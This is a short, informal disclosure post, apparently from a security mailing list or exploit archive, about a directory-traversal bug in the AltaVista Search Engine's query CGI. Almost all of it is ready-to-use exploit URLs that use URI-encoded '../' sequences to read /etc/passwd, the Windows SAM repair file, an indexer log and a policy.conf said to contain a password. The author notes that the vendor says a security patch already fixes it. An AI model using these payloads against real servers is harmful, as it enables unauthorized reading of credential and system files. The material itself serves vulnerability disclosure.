Exploit information for the recent bugs in the Altavista Search Engine to read any file on the system.
31947cb85d87ea62e83e870b5086f47b97bbc339e314a15df7b3eb2b2b1af1f4
hola,
more bugs in the AV-Search thing ..
using uri-encoded strings it is possible to view "any" file on the system ..
examples:
unixxxsss ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f/etc/passwd
or on an micro$oft IIS ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2f%2e%2e%2f\\winnt\\repair\\sam._
interesting infos about the file structure ...
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/indexer.log
or another file which does contain the password ..
http://server:[port]/cgi-bin/query?mss=%2e%2e%2f%2e%2e%2findex/intranet/policy.conf
altavista told me that this is(was) just a flavour of the "old" bug and its
fix is(was) included in the last secpatch.
whatever ....
nicedays :-/
RC
rudicarell@hotmail.com